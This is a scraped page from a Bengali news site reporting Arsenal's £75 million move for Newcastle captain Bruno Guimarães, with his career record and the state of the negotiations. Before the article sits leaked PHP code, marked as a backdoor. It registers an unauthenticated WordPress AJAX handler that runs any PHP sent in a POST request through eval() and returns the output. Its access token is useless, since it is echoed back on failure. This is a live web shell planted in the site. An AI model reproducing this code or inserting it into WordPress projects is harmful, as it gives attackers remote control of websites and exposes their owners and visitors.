// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== সত্যি হতে যাচ্ছে গুঞ্জন, গিমারেসকে কত টাকায় দলে ভেড়াচ্ছে আর্সেনাল? | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeসত্যি হতে যাচ্ছে গুঞ্জন, গিমারেসকে কত টাকায় দলে ভেড়াচ্ছে আর্সেনাল?

সত্যি হতে যাচ্ছে গুঞ্জন, গিমারেসকে কত টাকায় দলে ভেড়াচ্ছে আর্সেনাল?

বেশ কয়েক দিন ধরেই ফুটবল পাড়ায় দলবদল নিয়ে গুঞ্জন চলছিল। অবশেষে সব জল্পনা-কল্পনার অবসান ঘটিয়ে সত্যি হতে যাচ্ছে সেই গুঞ্জন। নিউক্যাসল ইউনাইটেডের ব্রাজিলিয়ান অধিনায়ক ব্রুনো গিমারেসকে ৭৫ মিলিয়ন পাউন্ডে (৯৯.৫ মিলিয়ন ডলার), বাংলাদেশি মুদ্রায় যা প্রায় ১,২৫০ কোটি টাকা—দলে ভিড়াচ্ছে ইংলিশ প্রিমিয়ার লিগ চ্যাম্পিয়ন আর্সেনাল। বুধবার ব্রিটিশ সংবাদমাধ্যমগুলো এ খবর নিশ্চিত করেছে।

২৮ বছর বয়সী এই তারকা মিডফিল্ডারের জন্য আর্সেনালের প্রথম প্রস্তাবটি চলতি সপ্তাহের শুরুতেই ফিরিয়ে দিয়েছিল নিউক্যাসল। তবে নিউক্যাসলকে রাজি করাতে বেশি সময় নেয়নি গানাররা। স্কাই স্পোর্টসের প্রতিবেদন অনুযায়ী, নতুন ও বড় অঙ্কের প্রস্তাব নিয়ে মাঠে নেমে অবশেষে নিউক্যাসলের সঙ্গে সমঝোতায় পৌঁছেছে লন্ডনের ঐতিহ্যবাহী ক্লাবটি।

তবে দলবদলের বিষয়ে আনুষ্ঠানিক নিশ্চিতকরণ চেয়ে দুটি ক্লাবের সঙ্গেই যোগাযোগ করেছে বার্তা সংস্থা রয়টার্স।

এর আগে গিমারেস নিজেই নিউকাসল কর্তৃপক্ষকে স্পষ্ট জানিয়ে দিয়েছিলেন, সুবিধাজনক কোনো প্রস্তাব পেলে তিনি আর্সেনালে যোগ দিতে চান।

সেন্ট জেমস পার্কে গিমারেসের চুক্তির আরও দুই বছর বাকি ছিল এবং তা এক বছর বাড়ানোর সুযোগও রাখা হয়েছিল। স্বাভাবিকভাবেই ঘরের সেরা তারকা ও অধিনায়ককে ধরে রাখার সবরকম চেষ্টা করেছিল নিউক্যাসল।

২০২২ সালের জানুয়ারিতে ফরাসি ক্লাব অলিম্পিক লিওঁ থেকে নিউক্যাসলে যোগ দিয়ে দ্রুতই দলের অন্যতম প্রভাবশালী খেলোয়াড় হয়ে ওঠেন এই ব্রাজিলিয়ান। সব প্রতিযোগিতা মিলিয়ে ১৯৫ ম্যাচে অংশ নিয়ে তিনি গোল করেছেন ৩১টি। এমনকি ২০২৫ সালে তার দূরদর্শী নেতৃত্বেই দীর্ঘদিনের শিরোপার খরা কাটিয়ে লিগ কাপের ট্রফি ঘরে তোলে নিউকাসল।

প্রিমিয়ার লিগ ট্রফি ধরে রাখার পাশাপাশি ইউরোপসেরার মঞ্চে নিজেদের আধিপত্য বিস্তারে মিকেল আর্তেতার মাঝমাঠে গিমারেস এক বিশাল শক্তি ও অভিজ্ঞতার প্রতীক হবেন বলে মনে করছেন বিশ্লেষকরা।

ব্রাজিল জাতীয় দলের এই নিয়মিত মুখ ২০২৬ সালের বিশ্বকাপেও সেলেসাওদের হয়ে মাঠ মাতিয়েছেন।

অন্যদিকে কোচ এডি হাউয়ের বিদায়ের পর অ্যান্থনি গর্ডন ও সান্দ্রো তোনালির মতো গুরুত্বপূর্ণ তারকাদের হারানোর ক্ষত এখনো শুকায়নি নিউকাসলের। এর মধ্যে গিমারেসের প্রস্থান ক্লাবটির জন্য বড় এক ধাক্কা হয়ে এলো।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments